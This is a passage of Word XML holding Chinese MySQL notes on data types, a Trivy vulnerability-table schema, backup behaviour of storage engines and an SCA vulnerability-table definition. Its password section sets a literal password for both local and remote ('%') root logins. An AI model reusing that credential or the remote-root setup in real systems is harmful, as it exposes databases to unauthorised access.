    </w:p>
    <w:p w14:paraId="34938663" w14:textId="1E3063E3" w:rsidR="00470F3D" w:rsidRDefault="006E2777" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TINY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">INT  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TINYINT(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标识布尔值，这只占一个字节</w:t>
      </w:r>
      <w:r w:rsidR="00C53D4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以标识</w:t>
      </w:r>
      <w:r w:rsidR="00C53D4A" w:rsidRPr="00C53D4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-128</w:t>
      </w:r>
      <w:r w:rsidR="00C53D4A" w:rsidRPr="00C53D4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidR="00C53D4A" w:rsidRPr="00C53D4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>127</w:t>
      </w:r>
      <w:r w:rsidR="000716BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，通常</w:t>
      </w:r>
      <w:r w:rsidR="000716BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="000716BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="000716BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r w:rsidR="000716BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，非</w:t>
      </w:r>
      <w:r w:rsidR="000716BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="000716BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标识</w:t>
      </w:r>
      <w:r w:rsidR="000716BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C114A0B" w14:textId="77777777" w:rsidR="00077132" w:rsidRDefault="00077132" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A913447" w14:textId="77777777" w:rsidR="00077132" w:rsidRPr="00077132" w:rsidRDefault="00077132" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4330F66B" w14:textId="77777777" w:rsidR="00077132" w:rsidRDefault="00077132" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3080696F" w14:textId="77777777" w:rsidR="00077132" w:rsidRDefault="00077132" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE775AA" w14:textId="77777777" w:rsidR="00077132" w:rsidRDefault="00077132" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5722F856" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc159779526"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="739DE916" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C03D5C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果判断存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cnvd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表，就先删除这个表，再进行表的创建。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2CCC3F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DROP TABLE IF EXISTS `cnvd`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A45304" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0211C142" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>CREATE TABLE `trivy`.`lang_vuls`(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2FBDBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>`id` bigint(20) AUTO_INCREMENT COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>自增</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>id',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088F07C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  `db_class` varchar(255) COLLATE utf8_unicode_ci DEFAULT NULL COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>该字段不清楚应怎么命名</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722A4178" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  `artifact` varchar(255) COLLATE utf8_unicode_ci DEFAULT NULL COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>组件</w:t>
      </w:r>
      <w:r>
        <w:t>G/A',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1E932D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  `vul_id` varchar(255) COLLATE utf8_unicode_ci DEFAULT NULL COMMENT 'VulId',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6201057B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  `patched_versions` varchar(255) COLLATE utf8_unicode_ci DEFAULT NULL COMMENT 'PatchedVersions',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3C1B3F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  `vulnerable_versions` varchar(255) COLLATE utf8_unicode_ci DEFAULT NULL COMMENT 'VulnerableVersions',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EE1861" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  `fixed_version` varchar(255) COLLATE utf8_unicode_ci DEFAULT NULL COMMENT 'FixedVersion',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A0892" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  `unaffected_version` varchar(255) COLLATE utf8_unicode_ci DEFAULT NULL COMMENT 'UnaffectedVersions',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34979FE2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  PRIMARY KEY (`id`) USING BTREE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DD6895" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440200E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE196D5" w14:textId="77777777" w:rsidR="00542D42" w:rsidRDefault="00542D42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0105A3F8" w14:textId="34BA9AFD" w:rsidR="00542D42" w:rsidRDefault="00542D42" w:rsidP="00542D42">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B446AB3" w14:textId="3C24A5D0" w:rsidR="00542D42" w:rsidRPr="001C58E3" w:rsidRDefault="002221AF" w:rsidP="00542D42">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C58E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>尽量同时改</w:t>
      </w:r>
      <w:r w:rsidRPr="001C58E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="001C58E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="001C58E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidRPr="001C58E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="001C58E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mysql.user</w:t>
      </w:r>
      <w:r w:rsidRPr="001C58E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中这俩是俩用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246D107F" w14:textId="77777777" w:rsidR="00B23C20" w:rsidRDefault="00B23C20" w:rsidP="00542D42"/>
    <w:p w14:paraId="7293192B" w14:textId="7C230288" w:rsidR="00542D42" w:rsidRDefault="00542D42" w:rsidP="00542D42">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A92096B" w14:textId="51D699EA" w:rsidR="00542D42" w:rsidRDefault="00542D42" w:rsidP="00542D42">
      <w:r w:rsidRPr="00542D42">
        <w:t>set password for 'root'@'localhost' = password('1qaz@WSX!QAZzaq1');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EC7F1D" w14:textId="77777777" w:rsidR="00542D42" w:rsidRPr="00542D42" w:rsidRDefault="00542D42" w:rsidP="00542D42"/>
    <w:p w14:paraId="76E05610" w14:textId="585768EB" w:rsidR="00542D42" w:rsidRDefault="00542D42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改远程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD84301" w14:textId="1B1BE0A5" w:rsidR="00542D42" w:rsidRDefault="00542D42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00542D42">
        <w:t>set password for 'root'@'%' = password('1qaz@WSX!QAZzaq1');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A786C36" w14:textId="77777777" w:rsidR="00542D42" w:rsidRDefault="00542D42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3670CA" w14:textId="5BF5BBD3" w:rsidR="00542D42" w:rsidRDefault="00542D42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>莫忘刷新权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B68F82A" w14:textId="0B355793" w:rsidR="00542D42" w:rsidRDefault="00542D42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00542D42">
        <w:lastRenderedPageBreak/>
        <w:t>flush privileges;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309056BA" w14:textId="77777777" w:rsidR="00542D42" w:rsidRDefault="00542D42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE9A9E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2728A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc159779527"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>索引</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="6F4E870C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc159779528"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库索引</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="329FBA31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>myisam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B6B3C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能热备份，可以冷备和温备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601AD7AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>innodb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D08BD3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>热备、冷备、温备都可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B90C2D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B8EA95C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc159779529"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键的索引</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="0B042723" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sca</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某漏洞表建表过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395E0EBB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>-- sca.blingsec_vulnerability definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6867EB6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>CREATE TABLE "blingsec_vulnerability" (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BFD072" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "id" varchar(255) NOT NULL COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>比瓴组件漏洞编号</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAC9E6C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "cwe_id" varchar(255) DEFAULT NULL COMMENT 'cwe</w:t>
      </w:r>
      <w:r>
        <w:t>编号</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B467C90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "name" varchar(255) DEFAULT NULL COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞名称</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A25664C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "affect_app" varchar(255) DEFAULT NULL COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>受影响的应用</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D23E1D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "affect_app_version" varchar(255) DEFAULT NULL COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>受影响应用版本</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A5A377" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "patched_version" varchar(255) DEFAULT NULL COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>修复版本</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287D10A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "class_type" varchar(50) DEFAULT NULL COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>包管理器类型</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F3C8D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "cvss_score" varchar(255) DEFAULT NULL COMMENT 'cvss v3 score </w:t>
      </w:r>
      <w:r>
        <w:t>漏洞评分</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036C4CC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "cvss_vector" varchar(255) DEFAULT NULL COMMENT 'cvss v3 vector </w:t>
      </w:r>
      <w:r>
        <w:t>漏洞评分</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCA2703" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "attack_complexity" varchar(30) DEFAULT NULL COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>攻击难易程度</w:t>
      </w:r>
      <w:r>
        <w:t>(high/model/low)',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22478B30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "vendor" varchar(255) DEFAULT NULL COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>厂商</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB375E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "published" date DEFAULT NULL COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>发布时间</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BEBAA4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "updated" date DEFAULT NULL COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>更新时间</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280B075D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "description" longtext COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞描述</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A262FD6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "solutions" longtext COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>修复建议</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3605EF4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "details" longtext COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞细节</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBA0630" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "references" longtext COMMENT '</w:t>
      </w:r>
      <w:r>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278C0F2B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
